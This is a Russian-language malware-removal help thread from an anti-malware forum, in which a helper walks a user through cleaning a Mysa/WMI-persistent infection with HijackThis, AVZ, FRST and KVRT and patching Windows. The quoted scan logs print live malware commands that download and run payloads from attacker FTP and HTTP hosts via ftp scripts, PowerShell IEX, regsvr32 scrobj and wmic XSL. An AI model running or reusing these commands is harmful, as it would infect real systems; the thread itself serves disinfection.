Добрый день, уважаемые специалисты!
Аутсорс-сотрудник нахватал вирусов. Несколько установлены на уровне драйвера, некоторые блокируют установку антивирусного ПО. Многочисленные чистки системы ни к чему не приводят - один из вирусов (mysa1) все еще запускается из планировщика заданий и самостоятельно восстанавливается. Из-за того, что сотрудник на удаленке (в другом городе), о переустановке ОС речи не идет. Очень надеюсь на Вашу помощь.
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
Уважаемый(ая) goodie-ru, спасибо за обращение на наш форум!
Помощь в лечении компьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста, поддержите проект.
Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки:Выполните скрипт в AVZ из папки Autologger:Код:O4 - HKLM\..\Run: [start] = C:\windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll O4 - MSConfig\startupreg: start [command] = C:\windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll (HKLM) (2020/01/21) O4-32 - HKLM\..\Run: [start] = C:\windows\system32\regsvr32.exe /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll O7 - IPSec: Name: win (2020/08/18) - {1d756c17-80d9-408b-b9c2-823fc7977fb3} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2020/08/18) - {1d756c17-80d9-408b-b9c2-823fc7977fb3} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2020/08/18) - {1d756c17-80d9-408b-b9c2-823fc7977fb3} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2020/08/18) - {1d756c17-80d9-408b-b9c2-823fc7977fb3} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2020/08/18) - {1d756c17-80d9-408b-b9c2-823fc7977fb3} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block O22 - Task: Mysa - C:\windows\system32\cmd.exe /c echo open ftp.ftp0810.ru>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe O22 - Task: Mysa1 - C:\windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa O22 - Task: Mysa2 - C:\windows\system32\cmd.exe /c echo open ftp.ftp0810.ru>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p O22 - Task: Mysa3 - C:\windows\system32\cmd.exe /c echo open ftp.ftp0810.ru>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe O22 - Task: Registration - C:\Program Files (x86)\Hewlett-Packard\HP Setup\Dependencies\RemEngine.exe Registration ShowMessageTask2D (file missing) O22 - Task: ok - C:\windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa O22 - Task: oka - c:\windows\inf\aspnet\lsma12.exe O25 - WMI Event: (no consumer) - (no filter) - O25 - WMI Event: killmm4 - killmm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll®svr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll®svr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll®svr32 /u /s /i:http://wmi.0810bye.ru:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"Компьютер перезагрузится.Код:begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); TerminateProcessByName('C:\Windows\inf\aspnet\lsma12.exe'); TerminateProcessByName('c:\windows\syswow64\rundll32.exe'); TerminateProcessByName('c:\windows\temp\conhou.exe'); StopService('46e1875725d27f70'); StopService('46e18e27509e6185'); StopService('46e24abfd8f37c12'); QuarantineFile('C:\Users\ОТ ПБ\appdata\local\oneclick\oneclickapp.64.exe', ''); QuarantineFile('C:\Users\ОТ ПБ\appdata\local\oneclick\oneclickbandhandler.64.exe', ''); QuarantineFile('c:\windows\debug\item.dat', ''); QuarantineFile('c:\windows\debug\ok.dat', ''); QuarantineFile('c:\windows\help\lsmosee.exe', ''); QuarantineFile('C:\Windows\inf\aspnet\lsma12.exe', ''); QuarantineFile('c:\windows\temp\conhos.exe', ''); QuarantineFile('c:\windows\temp\conhou.exe', ''); DeleteFile('a.exe', '64'); DeleteFile('C:\Program Files\DrWeb\dwnetfilter.exe', '64'); DeleteFile('C:\Users\ОТ ПБ\appdata\local\oneclick\oneclickapp.64.exe', ''); DeleteFile('C:\Users\ОТ ПБ\appdata\local\oneclick\oneclickbandhandler.64.exe', ''); DeleteFile('C:\Users\ОТ ПБ\AppData\Local\Temp\Temp1_ROMServer.zip\HookDrv.dll', '64'); DeleteFile('c:\windows\debug\item.dat>', '64'); DeleteFile('c:\windows\debug\item.dat', ''); DeleteFile('c:\windows\debug\item.dat', '64'); DeleteFile('c:\windows\debug\ok.dat', '64'); DeleteFile('c:\windows\help\lsmosee.exe>', '64'); DeleteFile('c:\windows\help\lsmosee.exe', '64'); DeleteFile('C:\Windows\inf\aspnet\lsma12.exe', ''); DeleteFile('c:\windows\inf\aspnet\lsma12.exe', '64'); DeleteFile('c:\windows\temp\conhos.exe', '64'); DeleteFile('c:\windows\temp\conhou.exe', ''); DeleteFile('c:\windows\temp\conhou.exe', '64'); DeleteFileMask('c:\users\от пб\appdata\local\oneclick', '*', false); DeleteDirectory('c:\users\от пб\appdata\local\oneclick'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start', 'command', '64'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start', '32'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\Run', 'start', '64'); RegKeyDel('HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\mrupdsrv', 'x64'); DeleteSchedulerTask('MicrosoftsWindows'); DeleteSchedulerTask('MicrosoftsWindowsu'); DeleteSchedulerTask('Mysa'); DeleteSchedulerTask('Mysa1'); DeleteSchedulerTask('Mysa2'); DeleteSchedulerTask('Mysa3'); DeleteSchedulerTask('ok'); DeleteSchedulerTask('oka'); CreateQurantineArchive(GetAVZDirectory + 'quarantine.zip'); ExecuteSysClean; ExecuteWizard('SCU', 3, 3, true); RebootWindows(true); end.
В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке Прислать запрошенный карантин над над первым сообщением в теме.
Пролечите систему с помощью KVRT или Dr. Web CureIt! и сделайте новые логи.
WBR,
Vadim
Сделал все по инструкции, пролечил CureIt'ом. Вирусы все еще в системе.
Запустите HijackThis, расположенный в папке Autologger (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора))и пофиксите только эти строки:Скачайте заранее KVRT и Обновление качества (только система безопасности) для систем Windows 7 на базе процессоров x64 (KB4012212), март 2017 г.Код:O4 - MSConfig\startupreg: DTRun [command] = c:\Program Files (x86)\ArcSoft\TotalMedia Suite\TotalMedia Theatre 3\uDTRun.exe (HKLM) (2013/07/07) (file missing) O4 - MSConfig\startupreg: File Sanitizer [command] = C:\Program Files (x86)\Hewlett-Packard\File Sanitizer\CoreShredder.exe (HKLM) (2013/07/06) (file missing) O4 - MSConfig\startupreg: Google Update [command] = C:\Users\ОТ ПБ\AppData\Local\Google\Update\1.3.35.422\GoogleUpdateCore.exe (HKCU) (2020/01/20) (file missing) O7 - IPSec: Name: win (2020/08/18) - {2de84c1b-8167-44a1-a714-7ce9f092cda3} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2020/08/18) - {2de84c1b-8167-44a1-a714-7ce9f092cda3} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2020/08/18) - {2de84c1b-8167-44a1-a714-7ce9f092cda3} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2020/08/18) - {2de84c1b-8167-44a1-a714-7ce9f092cda3} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block O7 - IPSec: Name: win (2020/08/18) - {2de84c1b-8167-44a1-a714-7ce9f092cda3} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block O22 - Task: (disabled) \Doctor Web\Dr.Web Daily scan - C:\Program Files\DrWeb\dwscanner.exe /full (file missing) O22 - Task: MicrosoftsWindows - c:\windows\temp\conhos.exe (file missing) O22 - Task: MicrosoftsWindowsu - c:\windows\temp\conhou.exe O22 - Task: Mysa - C:\windows\system32\cmd.exe /c echo open ftp.ftp0810.ru>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe O22 - Task: Mysa1 - C:\windows\system32\rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa O22 - Task: Mysa2 - C:\windows\system32\cmd.exe /c echo open ftp.ftp0810.ru>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p O22 - Task: Mysa3 - C:\windows\system32\cmd.exe /c echo open ftp.ftp0810.ru>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe O22 - Task: ok - C:\windows\system32\rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa O22 - Task: oka - c:\windows\inf\aspnet\lsma12.exe O25 - WMI Event: killmm4 - killmm3 - Event="__InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'", cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.0810bye.ru:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll®svr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll®svr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll®svr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll®svr32 /u /s /i:http://wmi.0810bye.ru:8080/s.txt scrobj.dll&wmic os get /FORMAT:"http://172.83.155.170:8170/s.xsl"
Проинструктируйте сотрудника, как пролечить систему и установить обновление. сделать это нужно, отключив компьютер от интернета.
По завершению прикрепите упакованный в архив файл отчёта report_<дата>_*.klr.enc1 из папки C:\KVRT_Data и сообщите, как дела. Учтите, без обновления системы заразу, скорее всего, не побороть.
WBR,
Vadim
Сотрудника проинструктировал, сеть отключили, KVRT отработал, обновление встало. После перезагрузки следов вирусов не вижу - планировщик чистый, память чистая. Огромное Вам спасибо!Я видел следы вирусов, но так и не смог понять, что они используют эксплойт системы безопасности. Вы видите гораздо глубже, искренний Вам респект.
Сделайте ещё такой лог, хвосты подчистим.
Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).
WBR,
Vadim
Вы правы, хвосты есть, но, судя по всему, неактивные.
Выделите и скопируйте в буфер обмена следующий код:Запустите FRST.EXE/FRST64.EXE, нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.Код:Start:: CreateRestorePoint: BootExecute: autocheck autochk * sdnclean64.exe CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION CHR HKU\S-1-5-21-219771085-2394837603-4013148220-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [odijcgafkhpobjlnfdgiacpdenpmbgme] CHR HKU\S-1-5-21-219771085-2394837603-4013148220-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [phkdcinmmljblpnkohlipaiodlonpinf] CHR HKU\S-1-5-21-219771085-2394837603-4013148220-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [pmpoaahleccaibbhfjfimigepmfmmbbk] S3 46e1875725d27f70; \??\C:\windows\TEMP\13d774a202.sys [X] S3 46e18e27509e6185; \??\C:\windows\TEMP\4f6f1a2eb.sys [X] S3 46e24abfd8f37c12; \??\C:\windows\TEMP\45da907aa.sys [X] 2020-08-19 18:38 - 2020-05-20 10:12 - 000000254 _____ C:\windows\system32\wmi.dat 2020-08-19 18:38 - 2019-10-15 13:24 - 000000254 _____ C:\windows\system32\n1.dat 2020-08-18 08:40 - 2019-10-15 20:59 - 000000077 _____ C:\windows\system32\ps 2020-08-18 08:40 - 2019-06-29 08:11 - 000000079 _____ C:\windows\system32\s 2020-08-18 08:40 - 2019-06-29 08:11 - 000000075 _____ C:\windows\system32\p 2019-06-26 15:47 - 2019-10-14 10:20 - 000000067 _____ () C:\Program Files\Common Files\xpdown.dat CMD: type C:\Program Files (x86)\SkypeLauncher.bat 2014-08-27 14:49 - 2014-08-27 14:49 - 000000110 ____H () C:\Program Files (x86)\SkypeLauncher.bat 2020-08-19 20:00 - 2020-08-19 21:15 - 000000000 ____D C:\KVRT_Data ContextMenuHandlers1: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => -> No File ContextMenuHandlers4: [AIMP] -> {1F77B17B-F531-44DB-ACA4-76ABB5010A28} => -> No File WMI:subscription\__FilterToConsumerBinding->CommandLineEventConsumer.Name=\"fuckann4\"",Filter="__EventFilter.Name=\"fuckann3\":: <==== ATTENTION FirewallRules: [{52E78BAB-9B93-47A7-B1FE-AF0FCF502925}] => (Allow) C:\Users\ОТ ПБ\AppData\Local\Temp\Temp1_ROMServer.zip\ROMServer.exe => No File FirewallRules: [{C25E5824-B140-4CB6-8D09-BB0250D1B19B}] => (Allow) C:\Users\ОТ ПБ\AppData\Local\Temp\Temp1_ROMServer.zip\ROMServer.exe => No File FirewallRules: [{E3834402-4C71-4EED-8856-B90297993D89}] => (Allow) C:\Users\ОТ ПБ\AppData\Local\Temp\Temp1_ROMServer (1).zip\ROMServer.exe => No File FirewallRules: [{82F0DACC-4B84-429A-AFD0-8970472A00A1}] => (Allow) C:\Users\ОТ ПБ\AppData\Local\Temp\Temp1_ROMServer (1).zip\ROMServer.exe => No File FirewallRules: [{F0801DAB-7761-48A5-B25E-6AEC175CAFE1}] => (Allow) C:\Users\ОТ ПБ\AppData\Local\Temp\Temp2_ROMServer.zip\ROMServer.exe => No File FirewallRules: [{5B272C34-22EA-4B84-80C6-C4597F83BE6A}] => (Allow) C:\Users\ОТ ПБ\AppData\Local\Temp\Temp2_ROMServer.zip\ROMServer.exe => No File FirewallRules: [{C47644DD-C541-44F1-A5CC-95D7A5BDACDB}] => (Allow) C:\Users\ОТ ПБ\AppData\Local\Temp\Temp2_ROMServer (1).zip\ROMServer.exe => No File FirewallRules: [{3B17BBCC-325D-4035-8BF9-D4111E23E1C7}] => (Allow) C:\Users\ОТ ПБ\AppData\Local\Temp\Temp2_ROMServer (1).zip\ROMServer.exe => No File FirewallRules: [{8C7AD91C-15BD-48FF-9725-7C8932860AE1}] => (Allow) C:\Users\ОТ ПБ\AppData\Local\Temp\Temp3_ROMServer.zip\ROMServer.exe => No File FirewallRules: [{343AC199-6B6D-4421-8353-7E3C64288406}] => (Allow) C:\Users\ОТ ПБ\AppData\Local\Temp\Temp3_ROMServer.zip\ROMServer.exe => No File FirewallRules: [{41A1D2F1-0F97-4FB5-8039-565C9B7EDB72}] => (Allow) C:\Users\ОТ ПБ\AppData\Local\Temp\Temp4_ROMServer.zip\ROMServer.exe => No File FirewallRules: [{05A406E4-EB47-442A-81D5-93FD2273875B}] => (Allow) C:\Users\ОТ ПБ\AppData\Local\Temp\Temp4_ROMServer.zip\ROMServer.exe => No File FirewallRules: [{AEEE7B73-D449-4E82-A90B-340E293ECAE4}] => (Allow) C:\Users\ОТ ПБ\AppData\Local\Temp\Temp5_ROMServer.zip\ROMServer.exe => No File FirewallRules: [{5F6500E5-F7F4-4310-8813-2130EE1EDC99}] => (Allow) C:\Users\ОТ ПБ\AppData\Local\Temp\Temp5_ROMServer.zip\ROMServer.exe => No File FirewallRules: [{2DBEF57F-FEE7-4F2D-9A9E-6D4550FAC5ED}] => (Block) LPort=445 FirewallRules: [{0700CC09-CA39-4019-ABEF-6B693C4D43A9}] => (Block) LPort=139 Reboot: End::
Компьютер будет перезагружен автоматически.
Удалите предустановленные программы:
Cisco EAP-FAST Module
Cisco LEAP Module
Cisco PEAP Module
Они, скорее всего, не нужны.
Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.
Приложите этот файл к своему следующему сообщению.
WBR,
Vadim
Все сделал, кроме:
ИFirewallRules: [{2DBEF57F-FEE7-4F2D-9A9E-6D4550FAC5ED}] => (Block) LPort=445
FirewallRules: [{0700CC09-CA39-4019-ABEF-6B693C4D43A9}] => (Block) LPort=139
На той стороне аутсорсер работает на несколько контор, конфигурация сети там может быть любая, после блокировки портов и удаления модулей поддержки протоколов может отвалиться сеть. Боязно...Удалите предустановленные программы:
Cisco EAP-FAST Module
Cisco LEAP Module
Cisco PEAP Module
Они, скорее всего, не нужны.
Эти 2 строчки фикса - наоборот, РАЗблокировка, но ладно, непринципиально. Но если у него 2 компьютера, на этот он по сети на шару не зайдёт.
Желательно, конечно, установить все обновления, не только эти критические, но были прецеденты, когда давно не обновлявшейся системе в процессе плохо становилось. На усмотрение...HotFix KB3177467 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4539602 Внимание! Скачать обновления
Архиваторы тоже используются в нехороших целях:WinRAR 4.20 (64-разрядная) v.4.20.0 Внимание! Скачать обновления
Дыра в WinRAR более 19 лет угрожала 500 миллионам пользователей.
Уязвимость в WinRAR активно эксплуатируется злоумышленниками.
Это всё обновить обязательно.Adobe Flash Player 32 ActiveX v.32.0.0.403 Внимание! Скачать обновления
Adobe Flash Player 32 NPAPI v.32.0.0.403 Внимание! Скачать обновления
Adobe Flash Player 32 PPAPI v.32.0.0.403 Внимание! Скачать обновления
opensource v.1.0.14960.3876 << Скрыта Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее.
Adobe Reader XI (11.0.23) - Russian v.11.0.23 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Adobe Acrobat Reader DC.
И есть там Malwarebytes, но в списке установленных программ там его нет.
WBR,
Vadim
Встали все, кроме KB3125574 - говорит, мол, обновление неприменимо (архитектуру выбрал правильную). Единственное, что смутило - в systeminfo ни одно из них не отображается.HotFix KB3177467 Внимание! Скачать обновления
HotFix KB3125574 Внимание! Скачать обновления
HotFix KB4499175 Внимание! Скачать обновления
HotFix KB4490628 Внимание! Скачать обновления
HotFix KB4539602 Внимание! Скачать обновления
Снес, поставил 7z.WinRAR 4.20 (64-разрядная) v.4.20.0
Все модули флеша обновил, Adobe Reader заменил на версию DC. А вот что такое opensource v.1.0.14960.3876 - не знаю, прошерстил реестр, - не нашел.Adobe Flash Player 32 ActiveX v.32.0.0.403 Внимание! Скачать обновления
Adobe Flash Player 32 NPAPI v.32.0.0.403 Внимание! Скачать обновления
Adobe Flash Player 32 PPAPI v.32.0.0.403 Внимание! Скачать обновления
opensource v.1.0.14960.3876 << Скрыта Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее.
Adobe Reader XI (11.0.23) - Russian v.11.0.23 Данная программа больше не поддерживается разработчиком. Рекомендуется деинсталлировать ее, скачать и установить Adobe Acrobat Reader DC.
Если повторная проверка SecurityCheck не выдаст предупреждение об отсутствии обновлений, значит, установились.Сообщение от goodie-ru
И ладно, может, что нужное.А вот что такое opensource v.1.0.14960.3876 - не знаю, прошерстил реестр, - не нашел.
Порядок на данный момент.
WBR,
Vadim
=D1=F2=E0=F2=E8=F1=F2=E8=EA=E0 =EF=F0=EE=E2=E5=E4=E5=ED=ED=EE=E3=EE =EB=
=E5=F7=E5=ED=E8=FF:
- =CF=EE=EB=F3=F7=E5=ED=EE =EA=E0=F0=E0=ED=F2=E8=ED=EE=E2: 1
- =CE=E1=F0=E0=E1=EE=F2=E0=ED=EE =F4=E0=E9=EB=EE=E2: 4
- =C2 =F5=EE=E4=E5 =EB=E5=F7=E5=ED=E8=FF =EE=E1=ED=E0=F0=F3=E6=E5=ED=FB=
=E2=F0=E5=E4=EE=ED=EE=F1=ED=FB=E5 =EF=F0=EE=E3=F0=E0=EC=EC=FB:
- c:\windows\debug\item.dat - UDS:DangerousObject.Multi.Generi=
c ( AVAST4: Win32:Trojan-gen )- c:\windows\temp\conhou.exe - HEUR:Trojan.Win32.Generic (=
BitDefender: Generic.Malware.Vdld.9AF40998, AVAST4: Win32:Trojan-gen =
)
Уважаемый(ая) goodie-ru, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.
Ваши права в разделе
